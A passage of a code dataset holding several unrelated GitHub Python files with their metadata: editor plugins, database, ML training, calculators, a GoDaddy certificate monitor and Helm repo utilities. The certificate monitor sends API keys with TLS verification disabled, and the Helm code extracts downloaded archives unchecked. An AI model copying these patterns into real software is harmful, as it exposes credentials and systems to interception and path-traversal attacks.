sublime.run_command('new_window')\n new_window = sublime.active_window()\n new_window.run_command(\n 'set_layout',\n {\n 'cols': [0.0, 0.5, 1.0],\n 'rows': [0.0, 1.0],\n 'cells': [[0, 0, 1, 1], [1, 0, 2, 1]]\n })\n\n file_name = os.path.basename(base_file)\n\n if user_file is None:\n user_file = '${packages}/User/' + file_name\n\n\n new_window.focus_group(0)\n new_window.run_command('open_file', {'file': base_file})\n new_window.focus_group(1)\n new_window.run_command('open_file', {'file': user_file})\n\n base_view = new_window.active_view_in_group(0)\n user_view = new_window.active_view_in_group(1)\n\n base_view.settings().set('edit_settings_view', True)\n user_view.settings().set('edit_settings_view', True)\n\n user_view.settings().set('default_contents', default)\n\n if user_view.is_dirty():\n user_view.insert\n\n base_view.set_read_only(True)\n\nclass EditSettingsListener:\n\n def on_close(self, view):\n \"\"\"\n Closes the other settings view when one of the two is closed\n \"\"\"\n\n view_settings = view.settings()\n\n if not view_settings.get('edit_settings_view'):\n return\n\n window = sublime.active_window()\n\n sublime.set_timeout(lambda: window.run_command('close_window'), 50)\n\n def on_load(self, view):\n default_contents = view.settings().get('default_contents')\n if not os.path.isfile(view.file_name()) and default_contents:\n view.run_command('insert_snippet', {'contents': default_contents})\n","repo_name":"PeterLEE159/sublime-backup","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25953365376","text":"#!/usr/bin/python3\n\n\"\"\"\n Script that creates a new state\n\n\"\"\"\n\nimport sys\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom model_state import Base, State\n\nif __name__ == '__main__':\n args = sys.argv\n Engine = create_engine('mysql+mysqldb://{}:{}@localhost/{}'\n .format(args[1], args[2], args[3]),\n pool_pre_ping=True)\n Session = sessionmaker(bind=Engine)\n session = Session()\n\n new_state = State(name='Louisiana')\n session.add(new_state)\n session.commit()\n\n print(new_state.id)\n","repo_name":"CodedJay672/alx-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/11-model_state_insert.py","file_name":"11-model_state_insert.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42090419913","text":"\"\"\"\nFaça um Programa para um caixa eletrônico.\nO programa deverá perguntar ao usuário a valor do saque e depois informar\nquantas notas de cada valor serão fornecidas.\nAs notas disponíveis serão as de 1, 5, 10, 50 e 100 reais.\nO valor mínimo é de 10 reais e o máximo de 600 reais.\nO programa não deve se preocupar com a quantidade de notas existentes na\nmáquina.\nExemplo 1:\nPara sacar a quantia de 256 reais, o programa fornece duas notas de 100,\numa nota de 50, uma nota de 5 e uma nota de 1;\nExemplo 2:\nPara sacar a quantia de 399 reais, o programa fornece três notas de 100,\numa nota de 50, quatro notas de 10, uma nota de 5 e quatro notas de 1.\n\"\"\"\n\nprint(\"O limite diário de saque é de R$ 600.\")\nsaque = float(input(\"Digite o valor que deseja sacar: \"))\nif 10 <= saque <= 600:\n print(f\"O valor do saque é de R$ {saque:.2f}.\")\n nota_100 = saque // 100\n saque = saque - (nota_100 * 100)\n nota_50 = saque // 50\n saque = saque - (nota_50 * 50)\n nota_10 = saque // 10\n saque = saque - (nota_10 * 10)\n nota_5 = saque // 5\n saque = saque - (nota_5 * 5)\n nota_1 = saque // 1\n print(\"Você receberá:\\n\"\n f\"{nota_100:.0f} cédula(s) de R$100,00\\n\"\n f\"{nota_50:.0f} cédula(s) de R$ 50,00\\n\"\n f\"{nota_10:.0f} cédula(s) de R$ 10,00\\n\"\n f\"{nota_5:.0f} cédula(s) de R$ 05,00\\n\"\n f\"{nota_1:.0f} cédula(s) de R$ 01,00\")\nelif 10 > saque > 1000:\n print(\"OPERAÇÃO NÃO REALIZADA - O valor é maior que o limite diário de saque.\")\nelse:\n print(\"Valor não permitido.\")\n","repo_name":"JoaoLuizDev/exercicios-python","sub_path":"wiki python/resolucoes/038.py","file_name":"038.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"43822543276","text":"# Python ≥3.5 is required\nimport sys\nassert sys.version_info >= (3, 5)\n\n# Scikit-Learn ≥0.20 is required\nimport sklearn\nassert sklearn.__version__ >= \"0.20\"\n\n# try:\n# # %tensorflow_version only exists in Colab.\n# %tensorflow_version 2.x\n# IS_COLAB = True\n# except Exception:\n# IS_COLAB = False\n\n# TensorFlow ≥2.0 is required\nimport tensorflow as tf\nfrom tensorflow import keras\nassert tf.__version__ >= \"2.0\"\n\n# if not tf.config.list_physical_devices('GPU'):\n# print(\"No GPU was detected. LSTMs and CNNs can be very slow without a GPU.\")\n# if IS_COLAB:\n# print(\"Go to Runtime > Change runtime and select a GPU hardware accelerator.\")\n\n# Common imports\nimport numpy as np\nimport os\nfrom pathlib import Path\n\n# to make this notebook's output stable across runs\nnp.random.seed(42)\ntf.random.set_seed(42)\n\n# To plot pretty figures\n# %matplotlib inline\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nmpl.rc('axes', labelsize=14)\nmpl.rc('xtick', labelsize=12)\nmpl.rc('ytick', labelsize=12)\n\n# Where to save the figures\nPROJECT_ROOT_DIR = \".\"\nCHAPTER_ID = \"rnn\"\nIMAGES_PATH = os.path.join(PROJECT_ROOT_DIR, \"images\", CHAPTER_ID)\nos.makedirs(IMAGES_PATH, exist_ok=True)\n\ndef save_fig(fig_id, tight_layout=True, fig_extension=\"png\", resolution=300):\n path = os.path.join(IMAGES_PATH, fig_id + \".\" + fig_extension)\n print(\"Saving figure\", fig_id)\n if tight_layout:\n plt.tight_layout()\n plt.savefig(path, format=fig_extension, dpi=resolution)\n\ndef generate_time_series(batch_size, n_steps):\n freq1, freq2, offsets1, offsets2 = np.random.rand(4, batch_size, 1)\n time = np.linspace(0, 1, n_steps)\n series = 0.5 * np.sin((time - offsets1) * (freq1 * 10 + 10)) # wave 1\n series += 0.2 * np.sin((time - offsets2) * (freq2 * 20 + 20)) # + wave 2\n series += 0.1 * (np.random.rand(batch_size, n_steps) - 0.5) # + noise\n return series[..., np.newaxis].astype(np.float32)\n\nnp.random.seed(42)\n\nn_steps = 50\nseries = generate_time_series(10000, n_steps + 10)\nX_train = series[:7000, :n_steps]\nX_valid = series[7000:9000, :n_steps]\nX_test = series[9000:, :n_steps]\nY = np.empty((10000, n_steps, 10))\nfor step_ahead in range(1, 10 + 1):\n Y[..., step_ahead - 1] = series[..., step_ahead:step_ahead + n_steps, 0]\nY_train = Y[:7000]\nY_valid = Y[7000:9000]\nY_test = Y[9000:]\n\nprint(X_train.shape), print(Y_train.shape)\n\nnp.random.seed(42)\ntf.random.set_seed(42)\n\ndef last_time_step_mse(Y_true, Y_pred):\n return keras.metrics.mean_squared_error(Y_true[:, -1], Y_pred[:, -1])\n\nmodel = keras.models.Sequential([\n keras.layers.Conv1D(filters=20, kernel_size=4, strides=2, padding=\"valid\",\n input_shape=[None, 1]),\n keras.layers.GRU(20, return_sequences=True),\n keras.layers.GRU(20, return_sequences=True),\n keras.layers.TimeDistributed(keras.layers.Dense(10))\n])\n\nmodel.compile(loss=\"mse\", optimizer=\"adam\", metrics=[last_time_step_mse])\nhistory = model.fit(X_train, Y_train[:, 3::2], epochs=20,\n validation_data=(X_valid, Y_valid[:, 3::2]))\n\nnp.random.seed(42)\ntf.random.set_seed(42)\n\nmodel = keras.models.Sequential()\nmodel.add(keras.layers.InputLayer(input_shape=[None, 1]))\nfor rate in (1, 2, 4, 8) * 2:\n model.add(keras.layers.Conv1D(filters=20, kernel_size=2, padding=\"causal\",\n activation=\"relu\", dilation_rate=rate))\nmodel.add(keras.layers.Conv1D(filters=10, kernel_size=1))\nmodel.compile(loss=\"mse\", optimizer=\"adam\", metrics=[last_time_step_mse])\nhistory = model.fit(X_train, Y_train, epochs=20,\n validation_data=(X_valid, Y_valid))\n\nclass GatedActivationUnit(keras.layers.Layer):\n def __init__(self, activation=\"tanh\", **kwargs):\n super().__init__(**kwargs)\n self.activation = keras.activations.get(activation)\n def call(self, inputs):\n n_filters = inputs.shape[-1] // 2\n linear_output = self.activation(inputs[..., :n_filters])\n gate = keras.activations.sigmoid(inputs[..., n_filters:])\n return self.activation(linear_output) * gate\n\ndef wavenet_residual_block(inputs, n_filters, dilation_rate):\n z = keras.layers.Conv1D(2 * n_filters, kernel_size=2, padding=\"causal\",\n dilation_rate=dilation_rate)(inputs)\n z = GatedActivationUnit()(z)\n z = keras.layers.Conv1D(n_filters, kernel_size=1)(z)\n return keras.layers.Add()([z, inputs]), z\n\nkeras.backend.clear_session()\nnp.random.seed(42)\ntf.random.set_seed(42)\n\nn_layers_per_block = 3 # 10 in the paper\nn_blocks = 1 # 3 in the paper\nn_filters = 32 # 128 in the paper\nn_outputs = 10 # 256 in the paper\n\ninputs = keras.layers.Input(shape=[None, 1])\nz = keras.layers.Conv1D(n_filters, kernel_size=2, padding=\"causal\")(inputs)\nskip_to_last = []\nfor dilation_rate in [2**i for i in range(n_layers_per_block)] * n_blocks:\n z, skip = wavenet_residual_block(z, n_filters, dilation_rate)\n skip_to_last.append(skip)\nz = keras.activations.relu(keras.layers.Add()(skip_to_last))\nz = keras.layers.Conv1D(n_filters, kernel_size=1, activation=\"relu\")(z)\nY_proba = keras.layers.Conv1D(n_outputs, kernel_size=1, activation=\"softmax\")(z)\n\nmodel = keras.models.Model(inputs=[inputs], outputs=[Y_proba])\n\nmodel.compile(loss=\"mse\", optimizer=\"adam\", metrics=[last_time_step_mse])\nhistory = model.fit(X_train, Y_train, epochs=2,\n validation_data=(X_valid, Y_valid))\n\n\n","repo_name":"lalitgarg12/TensorFlowCertificationPractice","sub_path":"10Chapter15TFBook/04Using1DConvSeq.py","file_name":"04Using1DConvSeq.py","file_ext":"py","file_size_in_byte":5388,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"37724073782","text":"def kalkulatorBMI():\r\n jenisKelamin = input(\"Jenis Kelamin [Pria/Wanita] :\\n=> \")\r\n jenisKelamin = jenisKelamin.capitalize()\r\n if jenisKelamin == \"Pria\" or jenisKelamin == \"Wanita\":\r\n None\r\n else:\r\n print(\"Mohon masukkan jenis kelamin yang benar sesuai pilihan\")\r\n kalkulatorBMI()\r\n\r\n usia = int(input(\"Usia :\\n=> \"))\r\n if usia < 18:\r\n result = print(\"Kalkulator hanya untuk 18 tahun ke atas\")\r\n return result and None\r\n \r\n beratBadan = float(input(\"Berat Badan (kg) :\\n=> \"))\r\n tinggiBadan = int(input(\"Tinggi Badan (cm) :\\n=> \"))\r\n\r\n meter = tinggiBadan/100\r\n calcBMI = beratBadan/meter**2\r\n if calcBMI < 18.5:\r\n result = print(\r\n f\"Hasil BMI < 18.5\\n=> {calcBMI}\\nBerat Badan Kurang\\nAnda kekurangan berat badan\"\r\n )\r\n return result\r\n elif 18.5 <= calcBMI < 22.9:\r\n result = print(\r\n f\"Hasil BMI diantara 18.5 dan 22.9\\n=> {calcBMI}\\nNormal\\nAnda memiliki berat badan ideal.\\nGood job!!\"\r\n )\r\n return result\r\n else:\r\n result = print(\r\n f\"Hasil BMI lebih dari 25\\n=> {calcBMI}\\nObesitas\\nAnda berada dalam kategori obesitas\"\r\n )\r\n return result\r\n \r\nrepeat = True \r\nwhile repeat:\r\n kalkulatorBMI()\r\n repeat = input(\"Ulang? [Ya/Tidak]\\n=> \")\r\n if repeat == \"Ya\" or repeat == \"ya\":\r\n repeat = True\r\n elif repeat == \"Tidak\" or repeat == \"tidak\":\r\n repeat = False\r\n else:\r\n print(\"Input Invalid!\")\r\n repeat = False","repo_name":"zkaraqy/Python","sub_path":"kalkulatorBMI.py","file_name":"kalkulatorBMI.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"15340729126","text":"import requests, json, base64, sys\nfrom datetime import date, datetime\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\nimport smtplib, ssl\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\n\n# GoDaddy Settings\nshopperId = '{your-shopper-id}'\napiKey = '{your-api-key}'\napiSecret = '{your-api-secret}'\nignoreExpired = True # True or False\nignoreRevoked = True # True or False\n\n\n# SMTP Settings\nsmtpServer = \"{your-smtp-server-address}\"\nemailSender = \"{email-address-of-the-report-sender}\"\nemailRecipients = \"{comma-separated-list-of-email-recipients}\"\n\n\ndef get_customer_id(key, secret, shopperId):\n headers = {'Authorization' : 'sso-key ' + key + ':' + secret}\n return requests.get('https://api.godaddy.com/v1/shoppers/' + shopperId + '?includes=customerId', headers = headers, verify = False).json()['customerId']\n\ndef list_certificates(key, secret, customerId):\n headers = {'Authorization' : 'sso-key ' + key + ':' + secret}\n return requests.get('https://api.godaddy.com/v2/customers/' + customerId + '/certificates', headers = headers, verify = False).json()['certificates']\n \ndef clean_date(date):\n return date[0:19].replace('T', ' ')\n \ndef calc_days_left(date):\n expiry_date = datetime.strptime(date, '%Y-%m-%d %H:%M:%S')\n return (expiry_date - datetime.now()).days\n \ndef send_email(sender, recipients, subject, content):\n message = MIMEMultipart(\"alternative\")\n message[\"Subject\"] = subject\n message[\"From\"] = sender\n message[\"To\"] = recipients\n message.attach(MIMEText(content, \"html\"))\n with smtplib.SMTP(smtpServer) as smtp:\n smtp.sendmail(sender, recipients, message.as_string())\n\ncertificates = list_certificates(apiKey, apiSecret, get_customer_id(apiKey, apiSecret, shopperId))\nhtml = \"\"\"\\\n\n \n \n \n \n \n \n

    GoDaddy Certificates Report

    \n

    Weekly certificates report for \"\"\" + date.today().strftime(\"%d/%m/%Y\") + \"\"\"

    \n \n \n\"\"\"\nfor certificate in certificates:\n if ('status' in certificate and certificate['status'] != 'DENIED' and (not ignoreExpired or (ignoreExpired and certificate['status'] != 'EXPIRED')) and (not ignoreRevoked or (ignoreRevoked and certificate['status'] != 'REVOKED'))):\n sans = ''\n if ('subjectAlternativeNames' in certificate):\n sans = ', '.join(certificate['subjectAlternativeNames'])\n cls = 'ok'\n days_left = calc_days_left(clean_date(certificate['validEndAt']))\n if (days_left <= 60 or certificate['status'] == 'EXPIRED' or certificate['status'] == 'REVOKED'):\n cls = 'alert'\n html += ''\n #print(certificate['commonName'] + ', ' + certificate['status'] + ', ' + clean_date(certificate['validStartAt']) + ', ' + clean_date(certificate['validEndAt']) + ', ' + str(calc_days_left(clean_date(certificate['validEndAt']))))\n \nhtml += \"\"\"\\\n
    Common NameSANStatusIssue DateExpire DateDays Left
    ' + certificate['commonName'] + '' + sans + '' + certificate['status'] + '' + clean_date(certificate['validStartAt']) + '' + clean_date(certificate['validEndAt']) + '' + str(days_left) + '
    \n
    [ Elad Ben-Matityahu ]
    \n \n \n\"\"\"\n\nsend_email(emailSender, emailRecipients, \"GoDaddy Certificates Report\", html)\n\n","repo_name":"bmelad/godaddy-certificates-monitor","sub_path":"godaddy-certificates-monitor.py","file_name":"godaddy-certificates-monitor.py","file_ext":"py","file_size_in_byte":4187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28332788740","text":"import os\nimport re\n\nmain_folder_name = input(\"Select folder: \")\nmain_folder_path = os.path.join(os.getcwd(), main_folder_name)\n# Define the regex pattern to extract the desired groups\npattern = r\"Gen5TriplesCustomGame-\\d{4}-\\d{2}-\\d{2}-mtn(\\w+)-mtn(\\w+)(?: \\((\\d+)\\))?\\.html\"\n# Iterate over the subfolders within the main folder\nfor folder_name in os.listdir(main_folder_path):\n sub_folder_path = os.path.join(main_folder_path, folder_name)\n if os.path.isdir(sub_folder_path):\n # Iterate over the files in the folder\n for file_name in os.listdir(sub_folder_path):\n file_path = os.path.join(sub_folder_path, file_name)\n if os.path.isfile(file_path):\n # Match the regex pattern against the filename\n match = re.match(pattern, file_name)\n if match:\n # Extract the groups\n group1 = match.group(1)\n group2 = match.group(2)\n group3 = int(match.group(3)) + 1 if match.group(3) else 1\n # Construct the new filename\n new_filename = f\"{folder_name}-{group1}-{group2}-g{group3}.html\"\n new_file_path = os.path.join(sub_folder_path, new_filename)\n # Rename the file\n os.rename(file_path, new_file_path)\n print(f\"Renamed '{file_name}' to '{new_filename}'\")\n else:\n print(f\"Skipped '{file_name}' as it doesn't match the pattern.\")","repo_name":"JT-jt3/pokemon_metronome_tournament","sub_path":"rename_files.py","file_name":"rename_files.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5431651275","text":"from django.db import models\n\nclass AthleteManager(models.Manager):\n def validator(self, form):\n print(form)\n errors = {}\n\n fname = form['fname']\n lname = form['lname']\n # gender = form['gender']\n image_path = form['image_path']\n sport = form['sport']\n\n if not fname:\n errors['fname'] = \"First name is required\"\n if not lname:\n errors['lname'] = \"Last name is required\"\n if not 'gender' in form:\n errors['gender'] = \"Gender is required\"\n if not image_path:\n errors['image_path'] = \"Image path is required\"\n if not sport:\n errors['sport'] = \"Sport is required\"\n\n # print(errors)\n\n if not errors:\n athlete = Athlete.objects.create(fname=fname, lname=lname, gender=form['gender'], image_path=image_path, sport=sport)\n return (True, athlete)\n else:\n return (False, errors)\n\n return (False, errors)\n\n\nclass Athlete(models.Model):\n fname = models.CharField(max_length=255)\n lname = models.CharField(max_length=255)\n gender = models.CharField(max_length=255)\n sport = models.CharField(max_length=255)\n image_path = models.CharField(max_length=255)\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n objects = AthleteManager()\n\n def __repr__(self):\n return f\"\"\n","repo_name":"nramiscal/athleteAJAXSearch","sub_path":"apps/myapp/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"730029100","text":"#-*- coding:utf-8 -*-\n\"\"\"\nrepo 包含repo处理的简单函数,包括返回chart版本列表\nchart名称列表以及根据字符搜索chart等功能\n\"\"\"\ntry:\n from StringIO import StringIO\nexcept ImportError:\n from io import BytesIO as StringIO\nimport os\nimport git\nimport requests\nimport shutil\nimport tarfile\nimport tempfile\nimport yaml\n\nfrom utils.exceptions import CustomError\n\n__all__ = [\"RepoUtils\", \"repo_chart\", \"repo_search\", \"chart_versions\", \"repo_index\", \"from_repo\", \"git_clone\", \"source_cleanup\"]\n\n\nclass RepoUtils(object):\n \"\"\"Utils for repo control\n \n 该类实现repo的基本分析操作.\n \"\"\"\n\n @staticmethod\n def repo_chart(index_data):\n \"\"\"return all item of chart\n\n return all item for index_data.\n\n Args:\n index_data: index.yaml的dict格式数据\n\n Returns:\n 由chart名称所组成的list\n\n \"\"\"\n return index_data[\"entries\"].keys()\n\n @staticmethod\n def repo_search(index_data, search_string):\n \"\"\"search chart name by keyword\n \n 搜索包含search_string的chart,并返回列表\n Args:\n index_data: index.yaml的dict格式数据\n search_string: 搜索字符串 \n\n Returns:\n 由chart名称所组成的list\n\n \"\"\"\n search_result = []\n for item in index_data[\"entries\"].keys():\n if item.find(search_string) != -1:\n search_result.append(item)\n return search_result\n\n @staticmethod\n def chart_versions(index_data, chart_name):\n \"\"\"return chart all versions\"\n 返回chart_name的所有版本列表 \n \n Args:\n index_data: index.yaml的dict格式数据(dict)\n chart_name: chart_name(str) \n\n Returns:\n 由chart version所组成的list\n\n \"\"\"\n chart_all_versions = index_data[\"entries\"][chart_name]\n chart_version_list = [item[\"version\"] for item in chart_all_versions]\n return chart_version_list\n\n @staticmethod\n def repo_index(repo_url, timeout=3):\n \"\"\"Downloads the Chart's repo index\n \n 返回repo_url的字典格式数据 \n \n Args:\n repo_url: repo的链接(str)\n timeout: 请求超时时间\n\n Returns:\n repo_url的字典数据\n \"\"\"\n index_url = os.path.join(repo_url, 'index.yaml')\n index = requests.get(index_url, timeout=timeout)\n return yaml.safe_load(index.content)\n\n @staticmethod\n def from_repo(repo_url, chart, version=None, timeout=3):\n \"\"\"Downloads the chart from a repo.\n\n 返回下载并解压后的chart目录 \n \n Args:\n repo_url: repo的链接(str)\n chart: chart名称(str)\n version: chart版本(str)\n timeout: 请求超时时间(int)\n\n Returns:\n 返回下载并解压后的chart目录 \n \"\"\"\n _tmp_dir = tempfile.mkdtemp(prefix='pyhelm-', dir='/tmp')\n index = RepoUtils.repo_index(repo_url)\n\n if chart not in index['entries']:\n raise CustomError('Chart not found in repo')\n\n versions = index['entries'][chart]\n\n if version is not None:\n versions = filter(lambda k: k['version'] == version, versions)\n\n metadata = sorted(versions, key=lambda x: x['version'])[0]\n for url in metadata['urls']:\n req = requests.get(url, stream=True, timeout=timeout)\n fobj = StringIO(req.content)\n tar = tarfile.open(mode=\"r:*\", fileobj=fobj)\n tar.extractall(_tmp_dir)\n return os.path.join(_tmp_dir, chart)\n\n @staticmethod\n def git_clone(repo_url, branch='master'):\n \"\"\"clones repo to a /tmp/ dir\n\n git clone代码到/tmp\n Args:\n repo_url: repo链接 \n branch: 分支名称\n\n Returns:\n 临时目录\n \"\"\"\n\n _tmp_dir = tempfile.mkdtemp(prefix='pyhelm-', dir='/tmp')\n git.Repo.clone_from(url=repo_url, to_path=_tmp_dir, branch=branch)\n\n return _tmp_dir\n\n @staticmethod\n def source_cleanup(target_dir):\n \"\"\"Clean up source.\n\n 清理临时目录 \n \n Args:\n target_dir: 待清理的目录 \n\n Returns:\n \"\"\"\n shutil.rmtree(os.path.split(target_dir)[0])\n\nif __name__ == \"__main__\":\n\n import repo\n print(help(repo))\n","repo_name":"aiopsclub/python-helm","sub_path":"pyhelm/repo.py","file_name":"repo.py","file_ext":"py","file_size_in_byte":4440,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"31"} +{"seq_id":"34407562023","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom PIL import Image\r\nimport matplotlib.pyplot as plt\r\nimport cv2\r\nimport os\r\nfrom scipy import misc\r\nimport numpy as np\r\nimport os.path\r\n\r\nimport torch.utils.data\r\nimport torchvision.transforms as transforms\r\n\r\ndef default_image_loader(path):\r\n \"\"\"\r\n return Image.open(path).convert('RGB')\r\n \"\"\"\r\n return Pipeline(path)\r\n\r\nclass TripletImageLoader(torch.utils.data.Dataset):\r\n def __init__(self, triplets_file_name, gpu, transform=None,loader=default_image_loader):\r\n \"\"\" triplets_file_name: A text file with each line containing three files, \r\n For a line of files 'a b c', a triplet is defined such that image a is more \r\n similar to image c than it is to image b, e.g., \r\n 0 2017 42 \"\"\"\r\n triplets = []\r\n for line in open(triplets_file_name):\r\n split = line.split(\" # \")\r\n triplets.append((split[0], split[1], split[2][:-1])) # anchor, far, close\r\n self.triplets = triplets\r\n self.transform = transform\r\n self.loader = loader\r\n self.dataset = len(self.triplets)\r\n self.gpu = gpu\r\n\r\n def __getitem__(self, index):\r\n path1, path2, path3 = self.triplets[index]\r\n img1 = self.loader(path1)\r\n img2 = self.loader(path2)\r\n img3 = self.loader(path3)\r\n if self.transform is not None:\r\n img1 = self.transform(img1)\r\n img2 = self.transform(img2)\r\n img3 = self.transform(img3)\r\n\r\n return img1, img2, img3\r\n\r\n def __len__(self):\r\n return len(self.triplets)\r\n \r\ndef Pipeline(path):\r\n image = misc.imread(path, mode = 'RGB')\r\n image_pp = im_preprocess(cv2.resize(image, (128,128)))\r\n #return np.asarray([image_pp])\r\n return image_pp\r\n \r\ndef im_preprocess(image):\r\n image = np.asarray(image, np.float32)\r\n image -= np.array([104, 117, 123], dtype=np.float32).reshape(1, 1, -1)\r\n image = image.transpose((2, 0, 1))\r\n return image\r\n","repo_name":"Holy225/DL-ComputerVision","sub_path":"Training/triplet_image_loader_square.py","file_name":"triplet_image_loader_square.py","file_ext":"py","file_size_in_byte":2003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31022433830","text":"\"\"\"\n=============\npython-oauth2\n=============\n\npython-oauth2 is a framework that aims at making it easy to provide\nauthentication via `OAuth 2.0 `_ within\nan application stack.\n\nUsage\n=====\n\nExample:\n\n.. literalinclude:: examples/base_server.py\n\nInstallation\n============\n\npython-oauth2 is available on\n`PyPI `_::\n\n pip install python-oauth2\n\n\"\"\"\n\nimport json\nfrom oauth2.client_authenticator import ClientAuthenticator, request_body\nfrom oauth2.error import OAuthInvalidError, \\\n ClientNotFoundError, OAuthInvalidNoRedirectError, UnsupportedGrantError\nfrom oauth2.log import app_log\nfrom oauth2.web import Response\nfrom oauth2.tokengenerator import Uuid4\nfrom oauth2.grant import Scope, AuthorizationCodeGrant, ImplicitGrant, \\\n ClientCredentialsGrant, ResourceOwnerGrant, RefreshToken\n\nVERSION = \"1.1.1\"\n\n\nclass Provider(object):\n \"\"\"\n Endpoint of requests to the OAuth 2.0 provider.\n\n :param access_token_store: An object that implements methods defined\n by :class:`oauth2.store.AccessTokenStore`.\n :type access_token_store: oauth2.store.AccessTokenStore\n :param auth_code_store: An object that implements methods defined by\n :class:`oauth2.store.AuthCodeStore`.\n :type auth_code_store: oauth2.store.AuthCodeStore\n :param client_store: An object that implements methods defined by\n :class:`oauth2.store.ClientStore`.\n :type client_store: oauth2.store.ClientStore\n :param token_generator: Object to generate unique tokens.\n :type token_generator: oauth2.tokengenerator.TokenGenerator\n :param client_authentication_source: A callable which when executed,\n authenticates a client.\n See :mod:`oauth2.client_authenticator`.\n :type client_authentication_source: callable\n :param response_class: Class of the response object.\n Defaults to :class:`oauth2.web.Response`.\n :type response_class: oauth2.web.Response\n\n .. versionchanged:: 1.0.0\n Removed parameter ``site_adapter``.\n \"\"\"\n authorize_path = \"/authorize\"\n token_path = \"/token\"\n\n def __init__(self, access_token_store, auth_code_store, client_store,\n token_generator, client_authentication_source=request_body,\n response_class=Response):\n self.grant_types = []\n self._input_handler = None\n\n self.access_token_store = access_token_store\n self.auth_code_store = auth_code_store\n self.client_authenticator = ClientAuthenticator(\n client_store=client_store,\n source=client_authentication_source)\n self.response_class = response_class\n self.token_generator = token_generator\n\n def add_grant(self, grant):\n \"\"\"\n Adds a Grant that the provider should support.\n\n :param grant: An instance of a class that extends\n :class:`oauth2.grant.GrantHandlerFactory`\n :type grant: oauth2.grant.GrantHandlerFactory\n \"\"\"\n if hasattr(grant, \"expires_in\"):\n self.token_generator.expires_in[grant.grant_type] = grant.expires_in\n\n if hasattr(grant, \"refresh_expires_in\"):\n self.token_generator.refresh_expires_in = grant.refresh_expires_in\n\n self.grant_types.append(grant)\n\n def dispatch(self, request, environ):\n \"\"\"\n Checks which Grant supports the current request and dispatches to it.\n\n :param request: The incoming request.\n :type request: :class:`oauth2.web.Request`\n :param environ: Dict containing variables of the environment.\n :type environ: dict\n\n :return: An instance of ``oauth2.web.Response``.\n \"\"\"\n try:\n grant_type = self._determine_grant_type(request)\n\n response = self.response_class()\n\n grant_type.read_validate_params(request)\n\n return grant_type.process(request, response, environ)\n except OAuthInvalidNoRedirectError:\n response = self.response_class()\n response.add_header(\"Content-Type\", \"application/json\")\n response.status_code = 400\n response.body = json.dumps({\n \"error\": \"invalid_redirect_uri\",\n \"error_description\": \"Invalid redirect URI\"\n })\n\n return response\n except OAuthInvalidError as err:\n response = self.response_class()\n return grant_type.handle_error(error=err, response=response)\n except UnsupportedGrantError:\n response = self.response_class()\n response.add_header(\"Content-Type\", \"application/json\")\n response.status_code = 400\n response.body = json.dumps({\n \"error\": \"unsupported_response_type\",\n \"error_description\": \"Grant not supported\"\n })\n\n return response\n except:\n app_log.error(\"Uncaught Exception\", exc_info=True)\n response = self.response_class()\n return grant_type.handle_error(\n error=OAuthInvalidError(error=\"server_error\",\n explanation=\"Internal server error\"),\n response=response)\n\n def enable_unique_tokens(self):\n \"\"\"\n Enable the use of unique access tokens on all grant types that support\n this option.\n \"\"\"\n for grant_type in self.grant_types:\n if hasattr(grant_type, \"unique_token\"):\n grant_type.unique_token = True\n\n @property\n def scope_separator(self, separator):\n \"\"\"\n Sets the separator of values in the scope query parameter.\n Defaults to \" \" (whitespace).\n\n The following code makes the Provider use \",\" instead of \" \"::\n\n provider = Provider()\n\n provider.scope_separator = \",\"\n\n Now the scope parameter in the request of a client can look like this:\n `scope=foo,bar`.\n \"\"\"\n Scope.separator = separator\n\n def _determine_grant_type(self, request):\n for grant in self.grant_types:\n grant_handler = grant(request, self)\n if grant_handler is not None:\n return grant_handler\n\n raise UnsupportedGrantError\n","repo_name":"wndhydrnt/python-oauth2","sub_path":"oauth2/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6399,"program_lang":"python","lang":"en","doc_type":"code","stars":122,"dataset":"github-code","pt":"31"} +{"seq_id":"11256251872","text":"\nimport os\nfrom flask import escape\nfrom google.cloud import datastore\n\ndef add_contact(request):\n request_json = request.get_json(silent=True)\n\n name = request_json['name']\n company = request_json['company']\n email = request_json['email']\n phone = request_json['phone']\n\n client = datastore.Client(os.environ['GCP_PROJECT_ID'])\n complete_key = client.key('Contacts')\n contact = datastore.Entity(key=complete_key)\n contact.update({\n 'name': name,\n 'company': company,\n 'email': email,\n 'phone': phone,\n })\n client.put(contact)\n\n return('Contact added.\\n',200)\n\n","repo_name":"techmaven/cloud-fn-training","sub_path":"Exercise5/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70348319449","text":"# THIS LENTO CLI IS FOR DEVELOPER USE ONLY. DO NOT\n# ATTEMPT TO 